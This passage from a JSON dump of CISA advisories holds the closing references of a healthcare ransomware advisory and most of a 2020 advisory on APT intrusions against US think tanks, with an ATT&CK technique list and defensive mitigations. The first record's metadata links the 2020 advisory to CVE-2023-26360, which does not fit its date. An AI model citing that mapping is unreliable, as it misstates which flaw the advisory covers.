Businesses and Organizations\"](<https://www.ic3.gov/media/2019/191002.aspx>)\n\n[Health Industry Cybersecurity Tactical Crisis Response](<https://healthsectorcouncil.org/hic-tcr/>)\n\n[Health Industry Cybersecurity Practices (HICP) ](<http://www.phe.gov/405d>)\n\n[HHS - Ransomware Spotlight Webinar ](<https://protect2.fireeye.com/url?k=661c55bd-3a495cae-661c6482-0cc47adb5650-bb09b09e1017f10b&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=99373fd9c7&e=7882426b51>)\n\n[HHS - Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients](<https://protect2.fireeye.com/url?k=b43c8fe1-e86986f2-b43cbede-0cc47adb5650-84218742b50e2b7e&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=3d453bb6fe&e=7882426b51>)\n\n[HHS - Ransomware Briefing ](<https://protect2.fireeye.com/url?k=6a477b44-36127257-6a474a7b-0cc47adb5650-f6c92a4c247070ec&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=071616ff3e&e=7882426b51>)\n\n[HHS - Aggressive Ransomware Impacts](<https://protect2.fireeye.com/url?k=fe80c15e-a2d5c84d-fe80f061-0cc47adb5650-2206dbc55c13f1de&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=ebb762e019&e=7882426b51>)\n\n[HHS - Ransomware Fact Sheet](<https://protect2.fireeye.com/url?k=2923cea5-7576c7b6-2923ff9a-0cc47adb5650-26d7a0932fe07e31&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=107ba38369&e=7882426b51>)\n\n[HHS - Cyber Attack Checklist](<https://protect2.fireeye.com/url?k=08e10c16-54b40505-08e13d29-0cc47adb5650-70b9e6fd13ea4f2d&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=bcc423d21d&e=7882426b51>)\n\n[HHS - Cyber-Attack Response Infographic](<https://protect2.fireeye.com/url?k=8497e505-d8c2ec16-8497d43a-0cc47adb5650-ba5cee20bcf28bab&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=dc2b43974c&e=7882426b51>)\n\n[NIST - Data Integrity 
Publication](<https://protect2.fireeye.com/url?k=0be33d8b-57b63498-0be30cb4-0cc47adb5650-be7b920b52ab7927&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=c89bf12fa8&e=7882426b51>)\n\n[NIST - Guide for Cybersecurity Event Recovery](<https://protect2.fireeye.com/url?k=5335b9d4-0f60b0c7-533588eb-0cc47adb5650-bbc2d82317c6bc45&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=eeb05487cf&e=7882426b51>)\n\n[NIST - Identifying and Protecting Assets Against Ransomware and Other Destructive Events](<https://protect2.fireeye.com/url?k=348a7900-68df7013-348a483f-0cc47adb5650-5210c734b99339b1&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=9f0f789411&e=7882426b51>)\n\n[NIST - Detecting and Responding to Ransomware and Other Destructive Events](<https://protect2.fireeye.com/url?k=daf6be91-86a3b782-daf68fae-0cc47adb5650-1f4f5f947a590fa0&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=958743a29c&e=7882426b51>)\n\n[NIST - Recovering from Ransomware and Other Destructive Events](<https://protect2.fireeye.com/url?k=90b40d5e-cce1044d-90b43c61-0cc47adb5650-bab63aa79a2b0b2a&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=4947ff3a54&e=7882426b51>)\n\n[Github List of IOCs](<https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456>)\n\n### Revisions\n\n * October 28, 2020: Initial version\n * October 29, 2020: Updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection\n * November 2, 2020: Updated FBI link\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": 
"NONE"}, "impactScore": 4.0}, "published": "2020-11-02T12:00:00", "type": "ics", "title": "Ransomware Activity Targeting the Healthcare and Public Health Sector", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2020-11-02T12:00:00", "id": "AA20-302A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:04:00", "description": "### Summary\n\n_This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have observed persistent continued cyber intrusions by advanced persistent threat (APT) actors targeting U.S. think tanks. This malicious activity is often, but not exclusively, directed at individuals and organizations that focus on international affairs or national security policy.[[1](<https://www.cyberscoop.com/european-think-tanks-hack-microsoft-fancy-bear-russia/>)] The following guidance may assist U.S. think tanks in developing network defense procedures to prevent or rapidly detect these attacks.\n\nAPT actors have relied on multiple avenues for initial access. 
These have included low-effort capabilities such as spearphishing emails and third-party message services directed at both corporate and personal accounts, as well as exploiting vulnerable web-facing devices and remote connection capabilities. Increased telework during the COVID-19 pandemic has expanded workforce reliance on remote connectivity, affording malicious actors more opportunities to exploit those connections and to blend in with increased traffic. Attackers may leverage virtual private networks (VPNs) and other remote work tools to gain initial access or persistence on a victim\u2019s network. When successful, these low-effort, high-reward approaches allow threat actors to steal sensitive information, acquire user credentials, and gain persistent access to victim networks.\n\nGiven the importance that think tanks can have in shaping U.S. policy, CISA and FBI urge individuals and organizations in the international affairs and national security sectors to immediately adopt a heightened state of awareness and implement the critical steps listed in the Mitigations section of this Advisory.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-336A-APT_Actors_Targeting_US_ThinkTanks.pdf>) for a PDF version of this report.\n\n### Technical Details\n\n#### ATT&CK Profile\n\nCISA created the following MITRE ATT&CK profile to provide a non-exhaustive list of tactics, techniques, and procedures (TTPs) employed by APT actors to break through think tanks\u2019 defenses, conduct reconnaissance in their environments, exfiltrate proprietary or confidential information, and execute effects on targets. 
These TTPs were included based upon closed reporting on APT actors that are known to target think tanks or based upon CISA incident response data.\n\n * _**Initial Access**_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001>)] \n * Valid Accounts [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]\n * Valid Accounts: Cloud Accounts [[T1078.004](<https://attack.mitre.org/versions/v7/techniques/T1078/004/>)]\n * External Remote Services [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]\n * Drive-by Compromise [[T1189](<https://attack.mitre.org/versions/v7/techniques/T1189>)]\n * Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>)] \n * Supply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v7/techniques/T1195/002>)]\n * Trusted Relationship [[T1199](<https://attack.mitre.org/versions/v7/techniques/T1199>)]\n * Phishing: Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v7/techniques/T1566/001>)]\n * Phishing: Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>)]\n * Phishing: Spearphishing via Service [[T1566.003](<https://attack.mitre.org/versions/v7/techniques/T1566/003>)]\n * _**Execution**_ [[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002>)] \n * Windows Management Instrumentation [[T1047](<https://attack.mitre.org/versions/v7/techniques/T1047>)]\n * Scheduled Task/Job: Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v7/techniques/T1053/005>)]\n * Command and Scripting Interpreter: PowerShell [[T1059.001](<https://attack.mitre.org/versions/v7/techniques/T1059/001>)]\n * Command and Scripting Interpreter: Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003>)]\n * Command and Scripting Interpreter: Unix Shell [[T1059.004](<https://attack.mitre.org/versions/v7/techniques/T1059/004>)]\n * 
Command and Scripting Interpreter: Visual Basic [[T1059.005](<https://attack.mitre.org/versions/v7/techniques/T1059/005>)]\n * Command and Scripting Interpreter: Python [[T1059.006](<https://attack.mitre.org/versions/v7/techniques/T1059/006>)]\n * Native API [[T1106](<https://attack.mitre.org/versions/v7/techniques/T1106>)]\n * Exploitation for Client Execution [[T1203](<https://attack.mitre.org/versions/v7/techniques/T1203>)]\n * User Execution: Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001>)]\n * User Execution: Malicious File [[T1204.002](<https://attack.mitre.org/versions/v7/techniques/T1204/002>)]\n * Inter-Process Communication: Dynamic Data Exchange [[T1559.002](<https://attack.mitre.org/versions/v7/techniques/T1559/002/>)]\n * System Services: Service Execution [[T1569.002](<https://attack.mitre.org/versions/v7/techniques/T1569/002>)]\n * _**Persistence**_ [[TA0003](<https://attack.mitre.org/versions/v7/tactics/TA0003>)] \n * Boot or Logon Initialization Scripts: Logon Script (Windows) [[T1037.001](<https://attack.mitre.org/versions/v7/techniques/T1037/001>)]\n * Scheduled Task/Job: Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v7/techniques/T1053/005>)]\n * Account Manipulation: Exchange Email Delegate Permissions [[T1098.002](<https://attack.mitre.org/versions/v7/techniques/T1098/002>)]\n * Create Account: Local Account [[T1136.001](<https://attack.mitre.org/versions/v7/techniques/T1136/001>)]\n * Office Application Startup: Office Test [[T1137.002](<https://attack.mitre.org/versions/v7/techniques/T1137/002>)]\n * Office Application Startup: Outlook Home Page [[T1137.004](<https://attack.mitre.org/versions/v7/techniques/T1137/004>)]\n * Browser Extensions [[T1176](<https://attack.mitre.org/versions/v7/techniques/T1176>)]\n * BITS Jobs [[T1197](<https://attack.mitre.org/versions/v7/techniques/T1197/>)]\n * Server Software Component: Web Shell 
[[T1505.003](<https://attack.mitre.org/versions/v7/techniques/T1505/003>)]\n * Pre-OS Boot: Bootkit [[T1542.003](<https://attack.mitre.org/versions/v7/techniques/T1542/003/>)]\n * Create or Modify System Process: Windows Service [[T1543.003](<https://attack.mitre.org/versions/v7/techniques/T1543/003>)]\n * Event Triggered Execution: Change Default File Association [[T1546.001](<https://attack.mitre.org/versions/v7/techniques/T1546/001>)]\n * Event Triggered Execution: Windows Management Instrumentation Event Subscription [[T1546.003](<https://attack.mitre.org/versions/v7/techniques/T1546/003>)]\n * Event Triggered Execution: Accessibility Features [[T1546.008](<https://attack.mitre.org/versions/v7/techniques/T1546/008>)]\n * Event Triggered Execution: Component Object Model Hijacking [[T1546.015](<https://attack.mitre.org/versions/v7/techniques/T1546/015>)]\n * Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [[T1547.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001>)]\n * Boot or Logon Autostart Execution: Shortcut Modification [[T1547.009](<https://attack.mitre.org/versions/v7/techniques/T1547/009>)]\n * _**Privilege Escalation**_ [[TA0004](<https://attack.mitre.org/versions/v7/tactics/TA0004>)] \n * Process Injection [[T1055](<https://attack.mitre.org/versions/v7/techniques/T1055>)]\n * Process Injection: Process Hollowing [[T1055.012](<https://attack.mitre.org/versions/v7/techniques/T1055/012>)]\n * Exploitation for Privilege Escalation [[T1068](<https://attack.mitre.org/versions/v7/techniques/T1068>)]\n * Access Token Manipulation: Token Impersonation/Theft [[T1134.001](<https://attack.mitre.org/versions/v7/techniques/T1134/001>)]\n * Event Triggered Execution: Accessibility Features [[T1546.008](<https://attack.mitre.org/versions/v7/techniques/T1546/008>)]\n * Boot or Logon Autostart Execution: Shortcut Modification [[T1547.009](<https://attack.mitre.org/versions/v7/techniques/T1547/009>)]\n * Abuse Elevation Control 
Mechanism: Bypass User Access Control [[T1548.002](<https://attack.mitre.org/versions/v7/techniques/T1548/002>)]\n * Hijack Execution Flow: DLL Side-Loading [[T1574.002](<https://attack.mitre.org/versions/v7/techniques/T1574/002>)]\n * _**Defense Evasion**_ [[TA0005](<https://attack.mitre.org/versions/v7/tactics/TA0005>)] \n * Rootkit [[T1014](<https://attack.mitre.org/versions/v7/techniques/T1014>)]\n * Obfuscated Files or Information: Binary Padding [[T1027.001](<https://attack.mitre.org/versions/v7/techniques/T1027/001>)]\n * Obfuscated Files or Information: Software Packing [[T1027.002](<https://attack.mitre.org/versions/v7/techniques/T1027/002>)]\n * Obfuscated Files or Information: Steganography [[T1027.003](<https://attack.mitre.org/versions/v7/techniques/T1027/003>)]\n * Obfuscated Files or Information: Indicator Removal from Tools [[T1027.005](<https://attack.mitre.org/versions/v7/techniques/T1027/005>)]\n * Masquerading: Match Legitimate Name or Location [[T1036.005](<https://attack.mitre.org/versions/v7/techniques/T1036/005>)]\n * Indicator Removal on Host: Clear Windows Event Logs [[T1070.001](<https://attack.mitre.org/versions/v7/techniques/T1070/001>)]\n * Indicator Removal on Host: Clear Command History [[T1070.003](<https://attack.mitre.org/versions/v7/techniques/T1070/003>)]\n * Indicator Removal on Host: File Deletion [[T1070.004](<https://attack.mitre.org/versions/v7/techniques/T1070/004>)]\n * Indicator Removal on Host: Timestomp [[T1070.006](<https://attack.mitre.org/versions/v7/techniques/T1070/006>)]\n * Modify Registry [[T1112](<https://attack.mitre.org/versions/v7/techniques/T1112>)]\n * Deobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v7/techniques/T1140>)]\n * Exploitation for Defense Evasion [[T1211](<https://attack.mitre.org/versions/v7/techniques/T1211>)]\n * Signed Binary Proxy Execution: Compiled HTML File [[T1218.001](<https://attack.mitre.org/versions/v7/techniques/T1218/001>)]\n * Signed Binary 
Proxy Execution: Mshta [[T1218.005](<https://attack.mitre.org/versions/v7/techniques/T1218/005>)]\n * Signed Binary Proxy Execution: Rundll32 [[T1218.011](<https://attack.mitre.org/versions/v7/techniques/T1218/011>)]\n * Template Injection [[T1221](<https://attack.mitre.org/versions/v7/techniques/T1221>)]\n * Execution Guardrails: Environmental Keying [[T1480.001](<https://attack.mitre.org/versions/v7/techniques/T1480/001>)]\n * Abuse Elevation Control Mechanism: Bypass User Access Control [[T1548.002](<https://attack.mitre.org/versions/v7/techniques/T1548/002>)]\n * Use Alternate Authentication Material: Application Access Token [[T1550.001](<https://attack.mitre.org/versions/v7/techniques/T1550/001>)]\n * Subvert Trust Controls: Code Signing [[T1553.002](<https://attack.mitre.org/versions/v7/techniques/T1553/002>)]\n * Impair Defenses: Disable or Modify Tools [[T1562.001](<https://attack.mitre.org/versions/v7/techniques/T1562/001>)]\n * Impair Defenses: Disable or Modify System Firewall [[T1562.004](<https://attack.mitre.org/versions/v7/techniques/T1562/004>)]\n * Hide Artifacts: Hidden Files and Directories [[T1564.001](<https://attack.mitre.org/versions/v7/techniques/T1564/001>)]\n * Hide Artifacts: Hidden Window [[T1564.003](<https://attack.mitre.org/versions/v7/techniques/T1564/003>)]\n * _**Credential Access**_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006>)] \n * OS Credential Dumping: LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001>)]\n * OS Credential Dumping: Security Account Manager [[T1003.002](<https://attack.mitre.org/versions/v7/techniques/T1003/002>)]\n * OS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v7/techniques/T1003/003>)]\n * OS Credential Dumping: LSA Secrets [[T1003.004](<https://attack.mitre.org/versions/v7/techniques/T1003/004>)]\n * OS Credential Dumping: Cached Domain Credentials 
[[T1003.005](<https://attack.mitre.org/versions/v7/techniques/T1003/005>)]\n * Network Sniffing [[T1040](<https://attack.mitre.org/versions/v7/techniques/T1040>)]\n * Input Capture: Keylogging [[T1056.001](<https://attack.mitre.org/versions/v7/techniques/T1056/001>)]\n * Brute Force: Password Cracking [[T1110.002](<https://attack.mitre.org/versions/v7/techniques/T1110/002>)]\n * Brute Force: Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v7/techniques/T1110/003>)]\n * Forced Authentication [[T1187](<https://attack.mitre.org/versions/v7/techniques/T1187>)]\n * Steal Application Access Token [[T1528](<https://attack.mitre.org/versions/v7/techniques/T1528>)]\n * Unsecured Credentials: Credentials in Files [[T1552.001](<https://attack.mitre.org/versions/v7/techniques/T1552/001>)]\n * Unsecured Credentials: Group Policy Preferences [[T1552.006](<https://attack.mitre.org/versions/v7/techniques/T1552/006>)]\n * Credentials from Password Stores: Credentials from Web Browsers [[T1555.003](<https://attack.mitre.org/versions/v7/techniques/T1555/003>)]\n * _**Discovery**_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007>)] \n * System Service Discovery [[T1007](<https://attack.mitre.org/versions/v7/techniques/T1007>)]\n * Query Registry [[T1012](<https://attack.mitre.org/versions/v7/techniques/T1012>)]\n * System Network Configuration Discovery [[T1016](<https://attack.mitre.org/versions/v7/techniques/T1016>)]\n * Remote System Discovery [[T1018](<https://attack.mitre.org/versions/v7/techniques/T1018>)]\n * System Owner/User Discovery [[T1033](<https://attack.mitre.org/versions/v7/techniques/T1033>)]\n * Network Sniffing [[T1040](<https://attack.mitre.org/versions/v7/techniques/T1040>)]\n * Network Service Scanning [[T1046](<https://attack.mitre.org/versions/v7/techniques/T1046>)]\n * System Network Connections Discovery [[T1049](<https://attack.mitre.org/versions/v7/techniques/T1049>)]\n * Process Discovery 
[[T1057](<https://attack.mitre.org/versions/v7/techniques/T1057>)]\n * Permission Groups Discovery: Local Groups [[T1069.001](<https://attack.mitre.org/versions/v7/techniques/T1069/001>)]\n * Permission Groups Discovery: Domain Groups [[T1069.002](<https://attack.mitre.org/versions/v7/techniques/T1069/002>)]\n * System Information Discovery [[T1082](<https://attack.mitre.org/versions/v7/techniques/T1082>)]\n * File and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v7/techniques/T1083>)]\n * Account Discovery: Local Account [[T1087.001](<https://attack.mitre.org/versions/v7/techniques/T1087/001>)]\n * Account Discovery: Domain Account [[T1087.002](<https://attack.mitre.org/versions/v7/techniques/T1087/002>)]\n * Peripheral Device Discovery [[T1120](<https://attack.mitre.org/versions/v7/techniques/T1120>)]\n * Network Share Discovery [[T1135](<https://attack.mitre.org/versions/v7/techniques/T1135>)]\n * Password Policy Discovery [[T1201](<https://attack.mitre.org/versions/v7/techniques/T1201/>)]\n * Software Discovery: Security Software Discovery [[T1518.001](<https://attack.mitre.org/versions/v7/techniques/T1518/001>)]\n * _**Lateral Movement**_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008>)] \n * Remote Services: Remote Desktop Protocol [[T1021.001](<https://attack.mitre.org/versions/v7/techniques/T1021/001>)]\n * Remote Services: SSH [[T1021.004](<https://attack.mitre.org/versions/v7/techniques/T1021/004>)]\n * Taint Shared Content [[T1080](<https://attack.mitre.org/versions/v7/techniques/T1080/>)]\n * Replication Through Removable Media [[T1091](<https://attack.mitre.org/versions/v7/techniques/T1091>)]\n * Exploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v7/techniques/T1210>)]\n * Use Alternate Authentication Material: Pass the Hash [[T1550.002](<https://attack.mitre.org/versions/v7/techniques/T1550/002>)]\n * Use Alternate Authentication Material: Pass the Ticket 
[[T1550.003](<https://attack.mitre.org/versions/v7/techniques/T1550/003>)]\n * _**Collection**_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009>)] \n * Data from Local System [[T1005](<https://attack.mitre.org/versions/v7/techniques/T1005>)]\n * Data from Removable Media [[T1025](<https://attack.mitre.org/versions/v7/techniques/T1025>)]\n * Data Staged: Local Data Staging [[T1074.001](<https://attack.mitre.org/versions/v7/techniques/T1074/001>)]\n * Screen Capture [[T1113](<https://attack.mitre.org/versions/v7/techniques/T1113>)]\n * Email Collection: Local Email Collection [[T1114.001](<https://attack.mitre.org/versions/v7/techniques/T1114/001>)]\n * Email Collection: Remote Email Collection [[T1114.002](<https://attack.mitre.org/versions/v7/techniques/T1114/002>)]\n * Automated Collection [[T1119](<https://attack.mitre.org/versions/v7/techniques/T1119>)]\n * Audio Capture [[T1123](<https://attack.mitre.org/versions/v7/techniques/T1123>)]\n * Data from Information Repositories: SharePoint [[T1213.002](<https://attack.mitre.org/versions/v7/techniques/T1213/002>)]\n * Archive Collected Data: Archive via Utility [[T1560.001](<https://attack.mitre.org/versions/v7/techniques/T1560/001>)]\n * Archive Collected Data: Archive via Custom Method [[T1560.003](<https://attack.mitre.org/versions/v7/techniques/T1560/003>)]\n * _**Command and Control**_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011>)] \n * Data Obfuscation: Junk Data [[T1001.001](<https://attack.mitre.org/versions/v7/techniques/T1001/001/>)]\n * Fallback Channels [[T1008](<https://attack.mitre.org/versions/v7/techniques/T1008>)]\n * Application Layer Protocol: Web Protocols [[T1071.001](<https://attack.mitre.org/versions/v7/techniques/T1071/001>)]\n * Application Layer Protocol: File Transfer Protocols [[T1071.002](<https://attack.mitre.org/versions/v7/techniques/T1071/002>)]\n * Application Layer Protocol: Mail Protocols 
[[T1071.003](<https://attack.mitre.org/versions/v7/techniques/T1071/003>)]\n * Application Layer Protocol: DNS [[T1071.004](<https://attack.mitre.org/versions/v7/techniques/T1071/004>)]\n * Proxy: External Proxy [[T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>)]\n * Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>)]\n * Proxy: Domain Fronting [[T1090.004](<https://attack.mitre.org/versions/v7/techniques/T1090/004>)]\n * Communication Through Removable Media [[T1092](<https://attack.mitre.org/versions/v7/techniques/T1092>)]\n * Non-Application Layer Protocol [[T1095](<https://attack.mitre.org/versions/v7/techniques/T1095>)]\n * Web Service: Dead Drop Resolver [[T1102.001](<https://attack.mitre.org/versions/v7/techniques/T1102/001>)]\n * Web Service: Bidirectional Communication [[T1102.002](<https://attack.mitre.org/versions/v7/techniques/T1102/002>)]\n * Multi-Stage Channels [[T1104](<https://attack.mitre.org/versions/v7/techniques/T1104>)]\n * Ingress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v7/techniques/T1105>)]\n * Data Encoding: Standard Encoding [[T1132.001](<https://attack.mitre.org/versions/v7/techniques/T1132/001>)]\n * Remote Access Software [[T1219](<https://attack.mitre.org/versions/v7/techniques/T1219>)]\n * Dynamic Resolution: Domain Generation Algorithms [[T1568.002](<https://attack.mitre.org/versions/v7/techniques/T1568/002>)]\n * Non-Standard Port [[T1571](<https://attack.mitre.org/versions/v7/techniques/T1571>)]\n * Protocol Tunneling [[T1572](<https://attack.mitre.org/versions/v7/techniques/T1572>)]\n * Encrypted Channel: Symmetric Cryptography [[T1573.001](<https://attack.mitre.org/versions/v7/techniques/T1573/001>)]\n * Encrypted Channel: Asymmetric Cryptography [[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>)]\n * _**Exfiltration**_ [[TA0010](<https://attack.mitre.org/versions/v7/tactics/TA0010>)] \n * Exfiltration Over C2 Channel 
[[T1041](<https://attack.mitre.org/versions/v7/techniques/T1041>)]\n * Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol [[T1048.003](<https://attack.mitre.org/versions/v7/techniques/T1048/003>)]\n * _**Impact**_ [[TA0040](<https://attack.mitre.org/versions/v7/tactics/TA0040>)] \n * Data Encrypted for Impact [[T1486](<https://attack.mitre.org/versions/v7/techniques/T1486>)]\n * Resource Hijacking [[T1496](<https://attack.mitre.org/versions/v7/techniques/T1496>)]\n * System Shutdown/Reboot [[T1529](<https://attack.mitre.org/versions/v7/techniques/T1529>)]\n * Disk Wipe: Disk Structure Wipe [[T1561.002](<https://attack.mitre.org/versions/v7/techniques/T1561/002>)]\n\n### Mitigations\n\nCISA and FBI recommend think tank organizations apply the following critical practices to strengthen their security posture.\n\n#### Leaders\n\n * Implement a training program to familiarize users with identifying social engineering techniques and phishing emails.\n\n#### Users/Staff\n\n * Log off remote connections when not in use.\n * Be vigilant against tailored spearphishing attacks targeting corporate and personal accounts (including both email and social media accounts).\n * Use different passwords for corporate and personal accounts.\n * Install antivirus software on personal devices to automatically scan and quarantine suspicious files.\n * Employ strong multi-factor authentication for personal accounts, if available.\n * Exercise caution when: \n * Opening email attachments, even if the attachment is expected and the sender appears to be known. 
See [Using Caution with Email Attachments](<https://www.us-cert.gov/ncas/tips/ST04-010>).\n * Using removable media (e.g., USB thumb drives, external drives, CDs).\n\n#### IT Staff/Cybersecurity Personnel\n\n * Segment and segregate networks and functions.\n * Change the default username and password of applications and appliances.\n * Employ strong multi-factor authentication for corporate accounts.\n * Deploy antivirus software on organizational devices to automatically scan and quarantine suspicious files.\n * Apply encryption to data at rest and data in transit.\n * Use email security appliances to scan and remove malicious email attachments or links.\n * Monitor key internal security tools and identify anomalous behavior. Flag any known indicators of compromise or threat actor behaviors for immediate response.\n * Organizations can implement mitigations of varying complexity and restrictiveness to reduce the risk posed by threat actors who use Tor (The Onion Router) to carry out malicious activities. See the CISA-FBI Joint Cybersecurity Advisory on [Defending Against Malicious Cyber Activity Originating from Tor](<https://us-cert.cisa.gov/ncas/alerts/aa20-183a>) for mitigation options and additional information.\n * Prevent exploitation of known software vulnerabilities by routinely applying software patches and upgrades. Foreign cyber threat actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations. If these vulnerabilities are left unpatched, exploitation often requires few resources and provides threat actors with easy access to victim networks. 
Review CISA and FBI\u2019s [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>) and other CISA alerts that identify vulnerabilities exploited by foreign attackers.\n * Implement an antivirus program and a formalized patch management process.\n * Block certain websites and email attachments commonly associated with malware (e.g., .scr, .pif, .cpl, .dll, .exe).\n * Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).\n * Implement Group Policy Object and firewall rules.\n * Implement filters at the email gateway and block suspicious IP addresses at the firewall.\n * Routinely audit domain and local accounts as well as their permission levels to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account.\n * Follow best practices for design and administration of the network to limit privileged account use across administrative tiers.\n * Implement a Domain-Based Message Authentication, Reporting & Conformance (DMARC) validation system.\n * Disable or block unnecessary remote services.\n * Limit access to remote services through centrally managed concentrators.\n * Deny direct remote access to internal systems or resources by using network proxies, gateways, and firewalls.\n * Limit unnecessary lateral communications.\n * Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.\n * Ensure applications do not store sensitive data or credentials insecurely.\n * Enable a firewall on agency workstations, configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure any scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to suspicious or risky sites. 
Contact law enforcement or CISA immediately regarding any unauthorized network access identified.\n * Visit the MITRE ATT&CK techniques and tactics pages linked in the ATT&CK Profile section above for additional mitigation and detection strategies for this malicious activity targeting think tanks.\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat. To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. 
To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:Central@cisa.gov>).\n\n### References\n\n * [CISA Alert: Microsoft Office 365 Security Recommendations](<https://us-cert.cisa.gov/ncas/alerts/aa20-120a>)\n * [CISA Alert: Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>)\n * [CISA Webpage: Telework Guidance](<https://www.cisa.gov/telework>)\n * [CISA Webpage: VPN-Related Guidance](<https://www.cisa.gov/vpn-related-guidance>)\n * [FBI Private Industry Notification: PIN 20200409-001](<http://image.communications.cyber.nj.gov/lib/fe3e15707564047c7c1270/m/2/PIN+-+4.9.2020.pdf>)\n\n[[1] CyberScoop: As Europe prepares to vote, Microsoft warns of Fancy Bear attacks on democratic think tanks](<https://www.cyberscoop.com/european-think-tanks-hack-microsoft-fancy-bear-russia/>)\n\n### Revisions\n\nInitial Version: December 1, 2020\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", 